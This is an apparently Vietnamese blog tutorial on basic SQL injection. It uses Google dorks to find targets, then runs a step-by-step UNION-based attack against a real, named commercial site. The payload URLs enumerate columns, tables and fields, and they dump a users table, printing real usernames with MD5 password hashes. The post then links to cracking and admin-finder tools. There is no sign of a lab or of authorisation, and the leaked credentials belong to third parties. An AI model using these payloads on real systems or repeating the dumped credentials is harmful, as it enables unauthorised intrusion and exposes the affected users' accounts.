Ở phần 3 này mình sẽ hướng dẫn khai thác lỗi SQL Injection cơ bản.Sử dụng Google dork
I-Sử dụng Dork trong SQL Injection
- Cú pháp "inurl:."domain"/"dorks"
"domain" = nhập tên miền như .com, .gov...
"dorks" = dork có tham số truyền vào như gallery?id= , index.php?id= ....
Ví dụ: "inurl:.gov/index.php?id="
inurl có thể thay bằng các dork khác như
intitle:
intext:
define:
site:
info:
link:
define:
site:
info:
link:
Ví dụ: "intext:.edu/gallery?id="
1 số dork mình tổng hợp file .txt
https://drive.google.com/file/d/0B7YFc10EXAsVQWJfcG9FQkVkLVU/view?usp=sharing
- Truy cập trang http://www.google.com
- Gõ vào thanh tìm kiếm "inurl:index.php?id="
II- Khai thác lỗi SQL Injection:
Tải công cụ addon trên Firefox hackbar
Truy cập trang: https://addons.mozilla.org/vi/firefox
Search: hackbar
Thêm dấu ' để check xem site có bị lỗi SQL Injection không ? Nếu giao diện hay title site đó thay đổi thì khoảng 70->80% site đó bị lỗi.
-->Lỗi rồi: You have an error in your SQL syntax
Chúng ta sẽ ORDER BY để xác định số cột của database của websitehttp://www.noor-arfa.com/products.php?catid=8 order by 100-- -
--> Không hiện lỗi. Thử thêm dấu - hoặc ' (catid=-8, catid=8', catid=-8')
http://www.noor-arfa.com/products.php?catid=8' order by 100-- -
--> Database query failed: Unknown column '100' in 'order clause'
Mình thường query order by 100 để xem trang có thay đổi gì không ? Ok vậy số cột chắc chắn <100. Thử order by từ 10 trở đi.
Comment | Name | |
---|---|---|
-- | : | MySQL Linux Style |
--+ | : | MySQL Windows Style |
# | : | Hash (URL encode while use) |
--+- | : | SQL Comment |
; | : | Null Byte |
` | : | Backtick |
http://www.noor-arfa.com/products.php?catid=8' order by 10-- -
http://www.noor-arfa.com/products.php?catid=8' order by 14-- -
--> Database query failed: Unknown column '14' in 'order clause'
--> Có 13 cột
http://www.noor-arfa.com/products.php?catid=8' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- -
--> Không hiện lỗi.Thêm dấu -
http://www.noor-arfa.com/products.php?catid=-8' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- -
http://www.noor-arfa.com/products.php?catid=-8' UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13-- -
--> version 5.5.48-cll
+ Khai thác Table_name:
http://www.noor-arfa.com/products.php?catid=-8' UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()-- -
--> countries,menu,menu_group,na_users,order_detail,orders,post,product_categories,products,products_bk,sliders,users,wnv_post
Thử khai thác các table_name users, na_users.
+ Khai thác Column trong table_name na_users . Chúng ta sẽ chuyển mã hex table này
na_users = 6e615f7573657273
http://www.noor-arfa.com/products.php?catid=-8' UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=0x6e615f7573657273-- -
--> id,username,password,name,address1,address2,zip,state,city,country,dob,phone,fax,email,signupdate,lastlogin,status,signupIP
+ Khai thác data
http://www.noor-arfa.com/products.php?catid=-8' UNION SELECT 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from na_users-- -
aris85:3f7caa3d471688b704b73e9a77b1107f,salharina:b2805c093f83761e5aba2a145067ddc7,MarcelleSO:b2805c093f83761e5aba2a145067ddc7,diyah2842:8e721d1c51f5109c989c77d9275fcf61,Nur:b2805c093f83761e5aba2a145067ddc7,Chua:b2805c093f83761e5aba2a145067ddc7,aida:b2805c093f83761e5aba2a145067ddc7,sk:b2805c093f83761e5aba2a145067ddc7,eleonora:b2805c093f83761e5aba2a145067ddc7,samfazba:b2805c093f83761e5aba2a145067ddc7,zeydazeynal:b2805c093f83761e5aba2a145067ddc7,leenmz:b2805c093f83761e5aba2a145067ddc7
User: aris85 Password:3f7caa3d471688b704b73e9a77b1107f
Ở đây password được mã hóa MD5. Các bạn có thể sử dụng tool để có thể biết password dạng gì. http://gh0stsec.blogspot.com/2016/02/zer0freaks-hash-identifier.htmlChúng ta tiến hành tìm link admin các bạn có thể tham khảo tool web admin finder
Link download:
https://drive.google.com/file/d/0B7YFc10EXAsVakZwdld0ZkdRM3M/view?usp=sharing
Trong phần tiếp theo mình sẽ nói về String based SQL Injection
0 comments:
Post a Comment